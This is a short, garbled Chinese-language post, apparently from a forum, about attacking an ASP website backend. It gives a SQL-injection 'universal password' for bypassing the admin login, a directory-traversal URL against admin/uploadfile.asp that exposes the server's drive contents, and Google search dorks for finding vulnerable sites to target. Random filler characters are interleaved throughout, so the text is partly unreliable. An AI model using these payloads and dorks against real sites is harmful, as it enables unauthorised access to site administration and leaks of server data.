后台万能密码 'or'='or'
2 B( P( P) V" ^# ~6 W& @
% N3 ?8 I0 @3 x( c* E3 [后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!2 d* e1 S! `& E+ q8 g
admin/uploadfile.asp?currentFolder=/upfiles/../
: Z) Y4 u$ u' j2 C o0 V( k3 X! R1 Q6 ]# X
漏洞证明:
" o+ H, H! i+ ~7 y5 w, l( j( g8 |7 n6 _/ _& k4 m# V0 H. ^: o
谷歌:inurl:type.asp?id=1 新闻中心
/ J% b$ C9 w! F( ^* w9 Q: a或者 :inurl:download_ok.asp?( C6 D" |) R, ? r
7 r/ ~' j& U4 w" x; R, e7 u& I7 p9 L
|